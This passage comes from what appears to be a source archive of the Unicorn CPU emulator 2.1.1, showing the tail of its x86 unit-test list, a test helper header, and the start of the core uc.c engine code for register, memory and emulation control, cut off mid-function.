TEST_IN_REG(RBX, 0x1122334455667788); TEST_OUT_REG(RAX, 0x8877665544337788); TEST_RUN(); } } TEST_LIST = { {"test_x86_in", test_x86_in}, {"test_x86_out", test_x86_out}, {"test_x86_mem_hook_all", test_x86_mem_hook_all}, {"test_x86_inc_dec_pxor", test_x86_inc_dec_pxor}, {"test_x86_relative_jump", test_x86_relative_jump}, {"test_x86_loop", test_x86_loop}, {"test_x86_invalid_mem_read", test_x86_invalid_mem_read}, {"test_x86_invalid_mem_write", test_x86_invalid_mem_write}, {"test_x86_invalid_jump", test_x86_invalid_jump}, {"test_x86_64_syscall", test_x86_64_syscall}, {"test_x86_16_add", test_x86_16_add}, {"test_x86_reg_save", test_x86_reg_save}, {"test_x86_invalid_mem_read_stop_in_cb", test_x86_invalid_mem_read_stop_in_cb}, {"test_x86_x87_fnstenv", test_x86_x87_fnstenv}, {"test_x86_mmio", test_x86_mmio}, {"test_x86_missing_code", test_x86_missing_code}, {"test_x86_smc_xor", test_x86_smc_xor}, {"test_x86_mmio_uc_mem_rw", test_x86_mmio_uc_mem_rw}, {"test_x86_sysenter", test_x86_sysenter}, {"test_x86_hook_cpuid", test_x86_hook_cpuid}, {"test_x86_486_cpuid", test_x86_486_cpuid}, {"test_x86_clear_tb_cache", test_x86_clear_tb_cache}, {"test_x86_clear_empty_tb", test_x86_clear_empty_tb}, {"test_x86_hook_tcg_op", test_x86_hook_tcg_op}, {"test_x86_cmpxchg", test_x86_cmpxchg}, {"test_x86_nested_emu_start", test_x86_nested_emu_start}, {"test_x86_nested_emu_stop", test_x86_nested_emu_stop}, {"test_x86_64_nested_emu_start_error", test_x86_64_nested_emu_start_error}, {"test_x86_eflags_reserved_bit", test_x86_eflags_reserved_bit}, {"test_x86_nested_uc_emu_start_exits", test_x86_nested_uc_emu_start_exits}, {"test_x86_clear_count_cache", test_x86_clear_count_cache}, {"test_x86_correct_address_in_small_jump_hook", test_x86_correct_address_in_small_jump_hook}, {"test_x86_correct_address_in_long_jump_hook", test_x86_correct_address_in_long_jump_hook}, {"test_x86_invalid_vex_l", test_x86_invalid_vex_l}, #if !defined(TARGET_READ_INLINED) && defined(BOOST_LITTLE_ENDIAN) {"test_x86_unaligned_access", test_x86_unaligned_access}, #endif {"test_x86_lazy_mapping", test_x86_lazy_mapping}, {"test_x86_16_incorrect_ip", test_x86_16_incorrect_ip}, {"test_x86_mmu", test_x86_mmu}, {"test_x86_vtlb", test_x86_vtlb}, {"test_x86_segmentation", test_x86_segmentation}, {"test_x86_0xff_lcall", test_x86_0xff_lcall}, {"test_x86_64_not_overwriting_tmp0_for_pc_update", test_x86_64_not_overwriting_tmp0_for_pc_update}, {"test_fxsave_fpip_x86", test_fxsave_fpip_x86}, {"test_fxsave_fpip_x64", test_fxsave_fpip_x64}, {"test_bswap_x64", test_bswap_ax}, {"test_rex_x64", test_rex_x64}, {NULL, NULL}}; ������������������������������������unicorn-2.1.1/tests/unit/unicorn_test.h�������������������������������������������������������������0000664�0000000�0000000�00000003735�14675241067�0020222�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef UNICORN_TEST_H #define UNICORN_TEST_H #include <stdio.h> #include <stdint.h> #include <unicorn/unicorn.h> #include "acutest.h" #include "endian.h" // Copied from glibc-2.29 /* Swap bytes in 32 bit value. */ #define bswap_32(x) \ ((((x)&0xff000000u) >> 24) | (((x)&0x00ff0000u) >> 8) | \ (((x)&0x0000ff00u) << 8) | (((x)&0x000000ffu) << 24)) /* Swap bytes in 64 bit value. */ #define bswap_64(x) \ ((((x)&0xff00000000000000ull) >> 56) | \ (((x)&0x00ff000000000000ull) >> 40) | \ (((x)&0x0000ff0000000000ull) >> 24) | \ (((x)&0x000000ff00000000ull) >> 8) | (((x)&0x00000000ff000000ull) << 8) | \ (((x)&0x0000000000ff0000ull) << 24) | \ (((x)&0x000000000000ff00ull) << 40) | \ (((x)&0x00000000000000ffull) << 56)) /** * Assert that err matches expect */ #define uc_assert_err(expect, err) \ do { \ uc_err __err = err; \ if (!TEST_CHECK(__err == expect)) { \ TEST_MSG("%s", uc_strerror(__err)); \ } \ } while (0) /** * Assert that err is UC_ERR_OK */ #define OK(stat) uc_assert_err(UC_ERR_OK, stat) #ifdef BOOST_LITTLE_ENDIAN #define LEINT32(x) (x) #define LEINT64(x) (x) #define BEINT32(x) (bswap_32(x)) #define BEINT64(x) (bswap_64(x)) #else #define LEINT32(x) (bswap_32(x)) #define LEINT64(x) (bswap_64(x)) #define BEINT32(x) (x) #define BEINT64(x) (x) #endif #endif /* UNICORN_TEST_H */ �����������������������������������unicorn-2.1.1/uc.c����������������������������������������������������������������������������������0000664�0000000�0000000�00000225760�14675241067�0013773�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "unicorn/unicorn.h" #if defined(UNICORN_HAS_OSXKERNEL) #include <libkern/libkern.h> #else #include <stddef.h> #include <stdio.h> #include <stdlib.h> #endif #include <time.h> // nanosleep #include <string.h> #include "uc_priv.h" // target specific headers #include "qemu/target/m68k/unicorn.h" #include "qemu/target/i386/unicorn.h" #include "qemu/target/arm/unicorn.h" #include "qemu/target/mips/unicorn.h" #include "qemu/target/sparc/unicorn.h" #include "qemu/target/ppc/unicorn.h" #include "qemu/target/riscv/unicorn.h" #include "qemu/target/s390x/unicorn.h" #include "qemu/target/tricore/unicorn.h" #include "qemu/include/tcg/tcg-apple-jit.h" #include "qemu/include/qemu/queue.h" #include "qemu-common.h" static void clear_deleted_hooks(uc_engine *uc); static uc_err uc_snapshot(uc_engine *uc); static uc_err uc_restore_latest_snapshot(uc_engine *uc); #if defined(__APPLE__) && defined(HAVE_PTHREAD_JIT_PROTECT) && \ defined(HAVE_SPRR) && (defined(__arm__) || defined(__aarch64__)) static void save_jit_state(uc_engine *uc) { if (!uc->nested) { uc->thread_executable_entry = thread_executable(); uc->current_executable = uc->thread_executable_entry; } uc->nested += 1; } static void restore_jit_state(uc_engine *uc) { assert(uc->nested > 0); if (uc->nested == 1) { assert(uc->current_executable == thread_executable()); if (uc->current_executable != uc->thread_executable_entry) { if (uc->thread_executable_entry) { jit_write_protect(true); } else { jit_write_protect(false); } } } uc->nested -= 1; } #else static void save_jit_state(uc_engine *uc) { (void)uc; } static void restore_jit_state(uc_engine *uc) { (void)uc; } #endif static void *hook_insert(struct list *l, struct hook *h) { void *item = list_insert(l, (void *)h); if (item) { h->refs++; } return item; } static void *hook_append(struct list *l, struct hook *h) { void *item = list_append(l, (void *)h); if (item) { h->refs++; } return item; } static void hook_invalidate_region(void *key, void *data, void *opaq) { uc_engine *uc = (uc_engine *)opaq; HookedRegion *region = (HookedRegion *)key; uc->uc_invalidate_tb(uc, region->start, region->length); } static void hook_delete(void *data) { struct hook *h = (struct hook *)data; h->refs--; if (h->refs == 0) { g_hash_table_destroy(h->hooked_regions); free(h); } } UNICORN_EXPORT unsigned int uc_version(unsigned int *major, unsigned int *minor) { if (major != NULL && minor != NULL) { *major = UC_API_MAJOR; *minor = UC_API_MINOR; } return (UC_API_MAJOR << 24) + (UC_API_MINOR << 16) + (UC_API_PATCH << 8) + UC_API_EXTRA; } static uc_err default_reg_read(void *env, int mode, unsigned int regid, void *value, size_t *size) { return UC_ERR_HANDLE; } static uc_err default_reg_write(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { return UC_ERR_HANDLE; } UNICORN_EXPORT uc_err uc_errno(uc_engine *uc) { return uc->errnum; } UNICORN_EXPORT const char *uc_strerror(uc_err code) { switch (code) { default: return "Unknown error code"; case UC_ERR_OK: return "OK (UC_ERR_OK)"; case UC_ERR_NOMEM: return "No memory available or memory not present (UC_ERR_NOMEM)"; case UC_ERR_ARCH: return "Invalid/unsupported architecture (UC_ERR_ARCH)"; case UC_ERR_HANDLE: return "Invalid handle (UC_ERR_HANDLE)"; case UC_ERR_MODE: return "Invalid mode (UC_ERR_MODE)"; case UC_ERR_VERSION: return "Different API version between core & binding (UC_ERR_VERSION)"; case UC_ERR_READ_UNMAPPED: return "Invalid memory read (UC_ERR_READ_UNMAPPED)"; case UC_ERR_WRITE_UNMAPPED: return "Invalid memory write (UC_ERR_WRITE_UNMAPPED)"; case UC_ERR_FETCH_UNMAPPED: return "Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)"; case UC_ERR_HOOK: return "Invalid hook type (UC_ERR_HOOK)"; case UC_ERR_INSN_INVALID: return "Invalid instruction (UC_ERR_INSN_INVALID)"; case UC_ERR_MAP: return "Invalid memory mapping (UC_ERR_MAP)"; case UC_ERR_WRITE_PROT: return "Write to write-protected memory (UC_ERR_WRITE_PROT)"; case UC_ERR_READ_PROT: return "Read from non-readable memory (UC_ERR_READ_PROT)"; case UC_ERR_FETCH_PROT: return "Fetch from non-executable memory (UC_ERR_FETCH_PROT)"; case UC_ERR_ARG: return "Invalid argument (UC_ERR_ARG)"; case UC_ERR_READ_UNALIGNED: return "Read from unaligned memory (UC_ERR_READ_UNALIGNED)"; case UC_ERR_WRITE_UNALIGNED: return "Write to unaligned memory (UC_ERR_WRITE_UNALIGNED)"; case UC_ERR_FETCH_UNALIGNED: return "Fetch from unaligned memory (UC_ERR_FETCH_UNALIGNED)"; case UC_ERR_RESOURCE: return "Insufficient resource (UC_ERR_RESOURCE)"; case UC_ERR_EXCEPTION: return "Unhandled CPU exception (UC_ERR_EXCEPTION)"; case UC_ERR_OVERFLOW: return "Provided buffer is too small (UC_ERR_OVERFLOW)"; } } UNICORN_EXPORT bool uc_arch_supported(uc_arch arch) { switch (arch) { #ifdef UNICORN_HAS_ARM case UC_ARCH_ARM: return true; #endif #ifdef UNICORN_HAS_ARM64 case UC_ARCH_ARM64: return true; #endif #ifdef UNICORN_HAS_M68K case UC_ARCH_M68K: return true; #endif #ifdef UNICORN_HAS_MIPS case UC_ARCH_MIPS: return true; #endif #ifdef UNICORN_HAS_PPC case UC_ARCH_PPC: return true; #endif #ifdef UNICORN_HAS_SPARC case UC_ARCH_SPARC: return true; #endif #ifdef UNICORN_HAS_X86 case UC_ARCH_X86: return true; #endif #ifdef UNICORN_HAS_RISCV case UC_ARCH_RISCV: return true; #endif #ifdef UNICORN_HAS_S390X case UC_ARCH_S390X: return true; #endif #ifdef UNICORN_HAS_TRICORE case UC_ARCH_TRICORE: return true; #endif /* Invalid or disabled arch */ default: return false; } } #define UC_INIT(uc) \ save_jit_state(uc); \ if (unlikely(!(uc)->init_done)) { \ int __init_ret = uc_init_engine(uc); \ if (unlikely(__init_ret != UC_ERR_OK)) { \ return __init_ret; \ } \ } static gint uc_exits_cmp(gconstpointer a, gconstpointer b, gpointer user_data) { uint64_t lhs = *((uint64_t *)a); uint64_t rhs = *((uint64_t *)b); if (lhs < rhs) { return -1; } else if (lhs == rhs) { return 0; } else { return 1; } } static uc_err uc_init_engine(uc_engine *uc) { if (uc->init_done) { return UC_ERR_HANDLE; } uc->hooks_to_del.delete_fn = hook_delete; for (int i = 0; i < UC_HOOK_MAX; i++) { uc->hook[i].delete_fn = hook_delete; } uc->ctl_exits = g_tree_new_full(uc_exits_cmp, NULL, g_free, NULL); if (machine_initialize(uc)) { return UC_ERR_RESOURCE; } // init tlb function if (!uc->cpu->cc->tlb_fill) { uc->set_tlb(uc, UC_TLB_CPU); } // init fpu softfloat uc->softfloat_initialize(); if (uc->reg_reset) { uc->reg_reset(uc); } uc->context_content = UC_CTL_CONTEXT_CPU; uc->unmapped_regions = g_array_new(false, false, sizeof(MemoryRegion *)); uc->init_done = true; return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **result) { struct uc_struct *uc; if (arch < UC_ARCH_MAX) { uc = calloc(1, sizeof(*uc)); if (!uc) { // memory insufficient return UC_ERR_NOMEM; } /* qemu/exec.c: phys_map_node_reserve() */ uc->alloc_hint = 16; uc->errnum = UC_ERR_OK; uc->arch = arch; uc->mode = mode; uc->reg_read = default_reg_read; uc->reg_write = default_reg_write; // uc->ram_list = { .blocks = QLIST_HEAD_INITIALIZER(ram_list.blocks) }; QLIST_INIT(&uc->ram_list.blocks); QTAILQ_INIT(&uc->memory_listeners); QTAILQ_INIT(&uc->address_spaces); switch (arch) { default: break; #ifdef UNICORN_HAS_M68K case UC_ARCH_M68K: if ((mode & ~UC_MODE_M68K_MASK) || !(mode & UC_MODE_BIG_ENDIAN)) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_m68k; break; #endif #ifdef UNICORN_HAS_X86 case UC_ARCH_X86: if ((mode & ~UC_MODE_X86_MASK) || (mode & UC_MODE_BIG_ENDIAN) || !(mode & (UC_MODE_16 | UC_MODE_32 | UC_MODE_64))) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_x86_64; break; #endif #ifdef UNICORN_HAS_ARM case UC_ARCH_ARM: if ((mode & ~UC_MODE_ARM_MASK)) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_arm; if (mode & UC_MODE_THUMB) { uc->thumb = 1; } break; #endif #ifdef UNICORN_HAS_ARM64 case UC_ARCH_ARM64: if (mode & ~UC_MODE_ARM_MASK) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_aarch64; break; #endif #if defined(UNICORN_HAS_MIPS) || defined(UNICORN_HAS_MIPSEL) || \ defined(UNICORN_HAS_MIPS64) || defined(UNICORN_HAS_MIPS64EL) case UC_ARCH_MIPS: if ((mode & ~UC_MODE_MIPS_MASK) || !(mode & (UC_MODE_MIPS32 | UC_MODE_MIPS64))) { free(uc); return UC_ERR_MODE; } if (mode & UC_MODE_BIG_ENDIAN) { #ifdef UNICORN_HAS_MIPS if (mode & UC_MODE_MIPS32) { uc->init_arch = uc_init_mips; } #endif #ifdef UNICORN_HAS_MIPS64 if (mode & UC_MODE_MIPS64) { uc->init_arch = uc_init_mips64; } #endif } else { // little endian #ifdef UNICORN_HAS_MIPSEL if (mode & UC_MODE_MIPS32) { uc->init_arch = uc_init_mipsel; } #endif #ifdef UNICORN_HAS_MIPS64EL if (mode & UC_MODE_MIPS64) { uc->init_arch = uc_init_mips64el; } #endif } break; #endif #ifdef UNICORN_HAS_SPARC case UC_ARCH_SPARC: if ((mode & ~UC_MODE_SPARC_MASK) || !(mode & UC_MODE_BIG_ENDIAN) || !(mode & (UC_MODE_SPARC32 | UC_MODE_SPARC64))) { free(uc); return UC_ERR_MODE; } if (mode & UC_MODE_SPARC64) { uc->init_arch = uc_init_sparc64; } else { uc->init_arch = uc_init_sparc; } break; #endif #ifdef UNICORN_HAS_PPC case UC_ARCH_PPC: if ((mode & ~UC_MODE_PPC_MASK) || !(mode & UC_MODE_BIG_ENDIAN) || !(mode & (UC_MODE_PPC32 | UC_MODE_PPC64))) { free(uc); return UC_ERR_MODE; } if (mode & UC_MODE_PPC64) { uc->init_arch = uc_init_ppc64; } else { uc->init_arch = uc_init_ppc; } break; #endif #ifdef UNICORN_HAS_RISCV case UC_ARCH_RISCV: if ((mode & ~UC_MODE_RISCV_MASK) || !(mode & (UC_MODE_RISCV32 | UC_MODE_RISCV64))) { free(uc); return UC_ERR_MODE; } if (mode & UC_MODE_RISCV32) { uc->init_arch = uc_init_riscv32; } else if (mode & UC_MODE_RISCV64) { uc->init_arch = uc_init_riscv64; } else { free(uc); return UC_ERR_MODE; } break; #endif #ifdef UNICORN_HAS_S390X case UC_ARCH_S390X: if ((mode & ~UC_MODE_S390X_MASK) || !(mode & UC_MODE_BIG_ENDIAN)) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_s390x; break; #endif #ifdef UNICORN_HAS_TRICORE case UC_ARCH_TRICORE: if ((mode & ~UC_MODE_TRICORE_MASK)) { free(uc); return UC_ERR_MODE; } uc->init_arch = uc_init_tricore; break; #endif } if (uc->init_arch == NULL) { free(uc); return UC_ERR_ARCH; } uc->init_done = false; uc->cpu_model = INT_MAX; // INT_MAX means the default cpu model. *result = uc; return UC_ERR_OK; } else { return UC_ERR_ARCH; } } UNICORN_EXPORT uc_err uc_close(uc_engine *uc) { int i; MemoryRegion *mr; if (!uc->init_done) { free(uc); return UC_ERR_OK; } // Cleanup internally. if (uc->release) { uc->release(uc->tcg_ctx); } g_free(uc->tcg_ctx); // Cleanup CPU. g_free(uc->cpu->cpu_ases); g_free(uc->cpu->thread); /* cpu */ free(uc->cpu); /* flatviews */ g_hash_table_destroy(uc->flat_views); // During flatviews destruction, we may still access memory regions. // So we free them afterwards. /* memory */ mr = &uc->io_mem_unassigned; mr->destructor(mr); mr = uc->system_io; mr->destructor(mr); mr = uc->system_memory; mr->destructor(mr); g_free(uc->system_memory); g_free(uc->system_io); for (size_t i = 0; i < uc->unmapped_regions->len; i++) { mr = g_array_index(uc->unmapped_regions, MemoryRegion *, i); mr->destructor(mr); g_free(mr); } g_array_free(uc->unmapped_regions, true); // Thread relateds. if (uc->qemu_thread_data) { g_free(uc->qemu_thread_data); } /* free */ g_free(uc->init_target_page); // Other auxilaries. g_free(uc->l1_map); if (uc->bounce.buffer) { qemu_vfree(uc->bounce.buffer); } // free hooks and hook lists clear_deleted_hooks(uc); for (i = 0; i < UC_HOOK_MAX; i++) { list_clear(&uc->hook[i]); } free(uc->mapped_blocks); g_tree_destroy(uc->ctl_exits); // finally, free uc itself. memset(uc, 0, sizeof(*uc)); free(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count) { UC_INIT(uc); reg_read_t reg_read = uc->reg_read; void *env = uc->cpu->env_ptr; int mode = uc->mode; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; void *value = vals[i]; size_t size = (size_t)-1; uc_err err = reg_read(env, mode, regid, value, &size); if (err) { restore_jit_state(uc); return err; } } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count) { UC_INIT(uc); reg_write_t reg_write = uc->reg_write; void *env = uc->cpu->env_ptr; int mode = uc->mode; int setpc = 0; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; const void *value = vals[i]; size_t size = (size_t)-1; uc_err err = reg_write(env, mode, regid, value, &size, &setpc); if (err) { restore_jit_state(uc); return err; } } if (setpc) { // force to quit execution and flush TB uc->quit_request = true; break_translation_loop(uc); } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_read_batch2(uc_engine *uc, int *regs, void *const *vals, size_t *sizes, int count) { UC_INIT(uc); reg_read_t reg_read = uc->reg_read; void *env = uc->cpu->env_ptr; int mode = uc->mode; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; void *value = vals[i]; uc_err err = reg_read(env, mode, regid, value, sizes + i); if (err) { restore_jit_state(uc); return err; } } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_write_batch2(uc_engine *uc, int *regs, const void *const *vals, size_t *sizes, int count) { UC_INIT(uc); reg_write_t reg_write = uc->reg_write; void *env = uc->cpu->env_ptr; int mode = uc->mode; int setpc = 0; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; const void *value = vals[i]; uc_err err = reg_write(env, mode, regid, value, sizes + i, &setpc); if (err) { restore_jit_state(uc); return err; } } if (setpc) { // force to quit execution and flush TB uc->quit_request = true; break_translation_loop(uc); } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_read(uc_engine *uc, int regid, void *value) { UC_INIT(uc); size_t size = (size_t)-1; uc_err err = uc->reg_read(uc->cpu->env_ptr, uc->mode, regid, value, &size); restore_jit_state(uc); return err; } UNICORN_EXPORT uc_err uc_reg_write(uc_engine *uc, int regid, const void *value) { UC_INIT(uc); int setpc = 0; size_t size = (size_t)-1; uc_err err = uc->reg_write(uc->cpu->env_ptr, uc->mode, regid, value, &size, &setpc); if (err) { restore_jit_state(uc); return err; } if (setpc) { // force to quit execution and flush TB uc->quit_request = true; break_translation_loop(uc); } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_reg_read2(uc_engine *uc, int regid, void *value, size_t *size) { UC_INIT(uc); uc_err err = uc->reg_read(uc->cpu->env_ptr, uc->mode, regid, value, size); restore_jit_state(uc); return err; } UNICORN_EXPORT uc_err uc_reg_write2(uc_engine *uc, int regid, const void *value, size_t *size) { UC_INIT(uc); int setpc = 0; uc_err err = uc->reg_write(uc->cpu->env_ptr, uc->mode, regid, value, size, &setpc); if (err) { restore_jit_state(uc); return err; } if (setpc) { // force to quit execution and flush TB uc->quit_request = true; break_translation_loop(uc); } restore_jit_state(uc); return UC_ERR_OK; } static size_t memory_region_len(uc_engine *uc, MemoryRegion *mr, uint64_t address, size_t count) { hwaddr end = mr->end; while (mr->container != uc->system_memory) { mr = mr->container; end += mr->addr; } return (size_t)MIN(count, end - address); } // check if a memory area is mapped // this is complicated because an area can overlap adjacent blocks static bool check_mem_area(uc_engine *uc, uint64_t address, size_t size) { size_t count = 0, len; while (count < size) { MemoryRegion *mr = uc->memory_mapping(uc, address); if (mr) { len = memory_region_len(uc, mr, address, size - count); count += len; address += len; } else { // this address is not mapped in yet break; } } return (count == size); } UNICORN_EXPORT uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *_bytes, size_t size) { size_t count = 0, len; uint8_t *bytes = _bytes; UC_INIT(uc); // qemu cpu_physical_memory_rw() size is an int if (size > INT_MAX) { restore_jit_state(uc); return UC_ERR_ARG; } if (!check_mem_area(uc, address, size)) { restore_jit_state(uc); return UC_ERR_READ_UNMAPPED; } // memory area can overlap adjacent memory blocks while (count < size) { MemoryRegion *mr = uc->memory_mapping(uc, address); if (mr) { len = memory_region_len(uc, mr, address, size - count); if (uc->read_mem(&uc->address_space_memory, address, bytes, len) == false) { break; } count += len; address += len; bytes += len; } else { // this address is not mapped in yet break; } } if (count == size) { restore_jit_state(uc); return UC_ERR_OK; } else { restore_jit_state(uc); return UC_ERR_READ_UNMAPPED; } } UNICORN_EXPORT uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *_bytes, size_t size) { size_t count = 0, len; const uint8_t *bytes = _bytes; UC_INIT(uc); // qemu cpu_physical_memory_rw() size is an int if (size > INT_MAX) { restore_jit_state(uc); return UC_ERR_ARG; } if (!check_mem_area(uc, address, size)) { restore_jit_state(uc); return UC_ERR_WRITE_UNMAPPED; } // memory area can overlap adjacent memory blocks while (count < size) { MemoryRegion *mr = uc->memory_mapping(uc, address); if (mr) { uint32_t operms = mr->perms; uint64_t align = uc->target_page_align; if (!(operms & UC_PROT_WRITE)) { // write protected // but this is not the program accessing memory, so temporarily // mark writable uc->readonly_mem(mr, false); } len = memory_region_len(uc, mr, address, size - count); if (uc->snapshot_level && uc->snapshot_level > mr->priority) { mr = uc->memory_cow(uc, mr, address & ~align, (len + (address & align) + align) & ~align); if (!mr) { return UC_ERR_NOMEM; } } if (uc->write_mem(&uc->address_space_memory, address, bytes, len) == false) { break; } if (!(operms & UC_PROT_WRITE)) { // write protected // now write protect it again uc->readonly_mem(mr, true); } count += len; address += len; bytes += len; } else { // this address is not mapped in yet break; } } if (count == size) { restore_jit_state(uc); return UC_ERR_OK; } else { restore_jit_state(uc); return UC_ERR_WRITE_UNMAPPED; } } #define TIMEOUT_STEP 2 // microseconds static void *_timeout_fn(void *arg) { struct uc_struct *uc = arg; int64_t current_time = get_clock(); do { usleep(TIMEOUT_STEP); // perhaps emulation is even done before timeout? if (uc->emulation_done) { break; } } while ((uint64_t)(get_clock() - current_time) < uc->timeout); // timeout before emulation is done? if (!uc->emulation_done) { uc->timed_out = true; // force emulation to stop uc_emu_stop(uc); } return NULL; } static void enable_emu_timer(uc_engine *uc, uint64_t timeout) { uc->timeout = timeout; qemu_thread_create(uc, &uc->timer, "timeout", _timeout_fn, uc, QEMU_THREAD_JOINABLE); } static void hook_count_cb(struct uc_struct *uc, uint64_t address, uint32_t size, void *user_data) { // count this instruction. ah ah ah. uc->emu_counter++; // printf(":: emu counter = %u, at %lx\n", uc->emu_counter, address); if (uc->emu_counter > uc->emu_count) { // printf(":: emu counter = %u, stop emulation\n", uc->emu_counter); uc_emu_stop(uc); } } static void clear_deleted_hooks(uc_engine *uc) { struct list_item *cur; struct hook *hook; int i; for (cur = uc->hooks_to_del.head; cur != NULL && (hook = (struct hook *)cur->data); cur = cur->next) { assert(hook->to_delete); for (i = 0; i < UC_HOOK_MAX; i++) { if (list_remove(&uc->hook[i], (void *)hook)) { break; } } } list_clear(&uc->hooks_to_del); } UNICORN_EXPORT uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count) { uc_err err; // reset the counter uc->emu_counter = 0; uc->invalid_error = UC_ERR_OK; uc->emulation_done = false; uc->size_recur_mem = 0; uc->timed_out = false; uc->first_tb = true; // Avoid nested uc_emu_start saves wrong jit states. if (uc->nested_level == 0) { UC_INIT(uc); } // Advance the nested levels. We must decrease the level count by one when // we return from uc_emu_start. if (uc->nested_level >= UC_MAX_NESTED_LEVEL) { // We can't support so many nested levels. return UC_ERR_RESOURCE; } uc->nested_level++; uint32_t begin_pc32 = READ_DWORD(begin); switch (uc->arch) { default: break; #ifdef UNICORN_HAS_M68K case UC_ARCH_M68K: uc_reg_write(uc, UC_M68K_REG_PC, &begin_pc32); break; #endif #ifdef UNICORN_HAS_X86 case UC_ARCH_X86: switch (uc->mode) { default: break; case UC_MODE_16: { uint16_t ip; uint16_t cs; uc_reg_read(uc, UC_X86_REG_CS, &cs); // compensate for later adding up IP & CS ip = begin - cs * 16; uc_reg_write(uc, UC_X86_REG_IP, &ip); break; } case UC_MODE_32: uc_reg_write(uc, UC_X86_REG_EIP, &begin_pc32); break; case UC_MODE_64: uc_reg_write(uc, UC_X86_REG_RIP, &begin); break; } break; #endif #ifdef UNICORN_HAS_ARM case UC_ARCH_ARM: uc_reg_write(uc, UC_ARM_REG_R15, &begin_pc32); break; #endif #ifdef UNICORN_HAS_ARM64 case UC_ARCH_ARM64: uc_reg_write(uc, UC_ARM64_REG_PC, &begin); break; #endif #ifdef UNICORN_HAS_MIPS case UC_ARCH_MIPS: // TODO: MIPS32/MIPS64/BIGENDIAN etc uc_reg_write(uc, UC_MIPS_REG_PC, &begin_pc32); break; #endif #ifdef UNICORN_HAS_SPARC case UC_ARCH_SPARC: // TODO: Sparc/Sparc64 uc_reg_write(uc, UC_SPARC_REG_PC, &begin); break; #endif #ifdef UNICORN_HAS_PPC case UC_ARCH_PPC: if (uc->mode & UC_MODE_PPC64) { uc_reg_write(uc, UC_PPC_REG_PC, &begin); } else { uc_reg_write(uc, UC_PPC_REG_PC, &begin_pc32); } break; #endif #ifdef UNICORN_HAS_RISCV case UC_ARCH_RISCV: if (uc->mode & UC_MODE_RISCV64) { uc_reg_write(uc, UC_RISCV_REG_PC, &begin); } else { uc_reg_write(uc, UC_RISCV_REG_PC, &begin_pc32); } break; #endif #ifdef UNICORN_HAS_S390X case UC_ARCH_S390X: uc_reg_write(uc, UC_S390X_REG_PC, &begin); break; #endif #ifdef UNICORN_HAS_TRICORE case UC_ARCH_TRICORE: uc_reg_write(uc, UC_TRICORE_REG_PC, &begin_pc32); break; #endif } uc->stop_request = false; uc->emu_count = count; // remove count hook if counting isn't necessary if (count <= 0 && uc->count_hook != 0) { uc_hook_del(uc, uc->count_hook); uc->count_hook = 0; // In this case, we have to drop all translated blocks. uc->tb_flush(uc); } // set up count hook to count instructions. if (count > 0 && uc->count_hook == 0) { uc_err err; // callback to count instructions must be run before everything else, // so instead of appending, we must insert the hook at the begin // of the hook list uc->hook_insert = 1; err = uc_hook_add(uc, &uc->count_hook, UC_HOOK_CODE, hook_count_cb, NULL, 1, 0); // restore to append mode for uc_hook_add() uc->hook_insert = 0; if (err != UC_ERR_OK) { uc->nested_level--; return err; } } // If UC_CTL_UC_USE_EXITS is set, then the @until param won't have any // effect. This is designed for the backward compatibility. if (!uc->use_exits) { uc->exits[uc->nested_level - 1] = until; } if (timeout) { enable_emu_timer(uc, timeout * 1000); // microseconds -> nanoseconds } uc->vm_start(uc); uc->nested_level--; // emulation is done if and only if we exit the outer uc_emu_start // or we may lost uc_emu_stop if (uc->nested_level == 0) { uc->emulation_done = true; // remove hooks to delete // make sure we delete all hooks at the first level. clear_deleted_hooks(uc); restore_jit_state(uc); } if (timeout) { // wait for the timer to finish qemu_thread_join(&uc->timer); } // We may be in a nested uc_emu_start and thus clear invalid_error // once we are done. err = uc->invalid_error; uc->invalid_error = 0; return err; } UNICORN_EXPORT uc_err uc_emu_stop(uc_engine *uc) { UC_INIT(uc); uc->stop_request = true; uc_err err = break_translation_loop(uc); restore_jit_state(uc); return err; } // return target index where a memory region at the address exists, or could be // inserted // // address either is inside the mapping at the returned index, or is in free // space before the next mapping. // // if there is overlap, between regions, ending address will be higher than the // starting address of the mapping at returned index static int bsearch_mapped_blocks(const uc_engine *uc, uint64_t address) { int left, right, mid; MemoryRegion *mapping; left = 0; right = uc->mapped_block_count; while (left < right) { mid = left + (right - left) / 2; mapping = uc->mapped_blocks[mid]; if (mapping->end - 1 < address) { left = mid + 1; } else if (mapping->addr > address) { right = mid; } else { return mid; } } return left; } // find if a memory range overlaps with existing mapped regions static bool memory_overlap(struct uc_struct *uc, uint64_t begin, size_t size) { unsigned int i; uint64_t end = begin + size - 1; i = bsearch_mapped_blocks(uc, begin); // is this the highest region with no possible overlap? if (i >= uc->mapped_block_count) return 